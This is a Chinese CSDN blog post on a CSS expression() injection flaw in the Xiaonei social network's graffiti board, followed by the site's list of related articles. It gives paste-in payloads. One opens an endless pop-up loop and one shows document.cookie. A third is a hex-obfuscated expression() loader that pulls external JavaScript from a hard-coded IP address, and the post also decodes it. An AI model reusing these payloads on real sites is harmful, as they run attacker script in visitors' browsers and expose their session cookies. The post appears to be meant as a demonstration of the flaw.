又见css漏洞!校内网css代码引发的漏洞

最新推荐文章于 2024-03-22 16:59:00 发布
最新推荐文章于 2024-03-22 16:59:00 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: css javascript 安全 文章标签: css javascript behavior div
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuche110/article/details/2474840
版权
css 同时被 3 个专栏收录
6 篇文章 0 订阅
订阅专栏
javascript
6 篇文章 0 订阅
订阅专栏
安全
3 篇文章 0 订阅
订阅专栏
<script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script><script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>

由涂鸦板css引来的漏洞

1、expression

如下语句加入到自己的涂鸦里去 ,
<DIV STYLE="width: expression(window.open('http://www.baidu.com'));">
这句会弹出窗口,死循环
<DIV STYLE="width: expression(alert(document.cookie));">
这句弹出你的cookie

2、behavior

将页面中元素绑定行为。


实例转:

1. 在你的 校内网 涂鸦版里插入以下代码:


<span id=spantarget></span>
<span id="jsInject" style="color:expression(eval(' //x74//x72//x79//x7B//x65//x73//x74//x2B//x2B//x3B//x7D//x63//x61//x74//x63//x68//x28//x65//x29//x7B//x65//x73//x74//x3D//x30//x3B//x7D//x3B//x69//x66//x20//x28//x65//x73//x74//x3C//x31//x29//x7B//x76//x61//x72//x20//x6F//x4A//x53//x3D//x64//x6F//x63//x75//x6D//x65//x6E//x74//x2E//x63//x72//x65//x61//x74//x65//x45//x6C//x65//x6D//x65//x6E//x74//x28//x27//x73//x63//x72//x69//x70//x74//x27//x29//x3B//x6F//x4A//x53//x2E//x73//x72//x63//x3D//x27//x68//x74//x74//x70//x3A//x2F//x2F//x32//x30//x32//x2E//x31//x31//x35//x2E//x32//x32//x2E//x31//x34//x31//x2F//x65//x73//x74//x2F//x78//x69//x61//x6F//x6E//x65//x69//x2E//x6A//x73//x27//x3B//x73//x70//x61//x6E//x74//x61//x72//x67//x65//x74//x2E//x61//x70//x70//x65//x6E//x64//x43//x68//x69//x6C//x64//x28//x6F//x4A//x53//x29//x3B//x7D ') )"></span>

 

其中转义字符为:

try{est++;}catch(e){est=0;};if (est<1){var oJS=document.createElement('script');oJS.src='http://202.115.22.141/est/xiaonei.js';spantarget.appendChild(oJS);}


2. 用到的外部javascript:


alert('External Javascript loaded!');
jsInject.cssText="";
alert('Expression stoped');

 
 关键字:校内网css代码  漏洞

<script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script><script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
ORACLE800
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透--63--CSS注入
武天旭的博客
09-23 2806
1、漏洞描述 CSS注入漏洞涉及在受信任的网站的上下文中注入任意CSS代码的能力,并将其呈现在受害者的浏览器中。此漏洞的影响可能会根据所提供的CSS有效负载而有所不同。该漏洞可能在特殊情况下导致跨站脚本,提取敏感数据泄漏数据或修改用户界面。 2、测试方法 当应用程序允许提供用户生成CSS或有可能在某种程度上干扰合法样式表时,就会发生此漏洞
CSS的bug和解决方法(Hack)
一只正在狂飙的肥兔
01-09 419
在任何标签中插入图片时,图片会将元素下方撑大三像素( 有可能是 >3像素 ) Hack 给 <img> 添加声明:display: block; 给 <img> 添加声明 vertical-align: top/middle; 注意:vertical-align 只对行内块有效 给 <img> 添加浮动,若父元素没有设置高度时要注意塌陷问题 给父元素添加 font-size: 0; 给父元素设置和图片一样的高度 当图片 ( 所有的行内元素和行..
Css 威胁用户安全的几种方式
Lyrelion的博客
12-26 689
Css 威胁用户安全的几种方式
安全漏洞css,常web漏洞分类
weixin_39562928的博客
08-04 635
漏洞分类相关:A rough list of the security checks offered by the tool is outlined below.* High risk flaws (potentially leading to system compromise):* Server-side query injection (including blind vectors, nu...
安全基础第六天:css注入
weixin_62870380的博客
03-27 1596
我是垃圾,没做出来,别看
XSS漏洞及其工具Beef使用
最新发布
ytdd66的博客
03-22 1380
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
内网css代码添加背景图片常用代码
10-30
喜欢个性化内网网页的朋友,可以用到的,感兴趣可以看下,网页中背景设置的一些属性
HTML+CSS+JS的爱心代码.zip
06-19
HTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码.zipHTML+CSS+JS的爱心代码....
一个CSS reset.css文件示例代码(下载)
05-12
摘要:脚本资源,CSS特效,reset.css 转载白鹿本人写的CSS中常用的 reset.css文件,用于重置html默认样式,前几天正好在论坛...因此 reset.css的具体代码也不尽相同,这一份reset.css同样只为您提供参考,交流一种方法。
浅谈CSS代码重构
09-24
CSS代码重构】是优化和改进现有CSS代码的过程,旨在提高代码的可读性、可维护性和性能,同时保持原有功能不变。重构的关键在于改善代码结构,使其更符合最佳实践和设计模式,以便团队协作和长期项目的可持续发展。...
淘宝css代码生成器源代码
03-18
功能1:专业版/基础版CSS导航背景变色代码生成器 功能2:专业版1440*500两图全屏海报轮播(自动居中) 功能3:美女旺旺客服在线生成器(支持旺铺专业版) 功能4:专业版店铺950公告滚动条生成 功能5:店铺装修背景...
phpweb通用上传漏洞
05-16
phpweb通用上传漏洞 一键GETshell 不用多解释了
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
css中的xss漏洞
kuiyuexiang的专栏
11-29 2063
上周六早上给出了百度空间XSS漏洞的PoC代码,结果过了一个周末,到处是所谓“强制加链接教程”的转载。从百度空间吧的帖子看,有一些网友的空间已经被强制加了链接。利用这个漏洞的蠕虫也出来了。好在百度已经打了补丁,现有的PoC代码已经无法工作了。再次赞一次百度的迅速反应 :) 百度此次推出的补丁,过滤了CSS文本中的"javascript"和"expression"字符串,不过仍然有些小缺陷,还是可以...
Web 安全漏洞之 XSS 攻击
GJ_ia的博客
01-14 149
XSS(Cross-Site Scripting)又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的。常的 XSS 攻击有三种:反射型、DOM-based 型、存储型。其中反射型、DOM-based 型可以归类为非持久型 XSS 攻击,存储型归类为持久型 XSS 攻击。
css攻击技术初探
Cocowool的专栏
11-19 2626
跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中插入恶意的JavaScript,VBScript, ActiveX,HTML,或Flash等脚本,窃取浏览此页面的用户的信息,改变用户的设置,破坏用户数据的攻击技术。跨站脚本攻击在多数情况下不会对 服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁,这主要是由于服务器对用户提交的数据过滤不完整
令人惊叹的 CSS 漏洞攻击,Firefox 和 Chrome 中枪
redditnote的博客
06-03 489
(点击上方蓝字,快速关注我们)转自:开源中国来自 Google 的安全工程师Ruslan Habalov 近日在其个人站点中披露,在 Chrome 和 Firefox ...
漏洞和攻击及防范方法
思而慕之。
09-07 1万+
XSS(Cross-Site Script) 跨站脚本攻击1.Reflected XSS(基于反射的XSS攻击) 诱骗用户点击带攻击性的代码链接,服务器解析后响应,不转存数据库,在服务器响应的内容中有攻击性代码,被浏览器执行,从而获取信息等。不过这个url是会被用户怀疑的。2.Stored XSS(基于存储的XSS攻击) 主动提交恶意数据到服务器,提交的代码能存储在数据库中(谁做的服务器端验拖
CSS代码规范与书写指南
本文将详细介绍CSS代码规范的一些核心要点,帮助开发者编写出整洁、易读、易维护的CSS代码。 1. 文件编码与格式 - CSS文件应使用无BOM(Byte Order Mark)的UTF-8编码,以确保文件在不同系统和环境下的兼容性,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值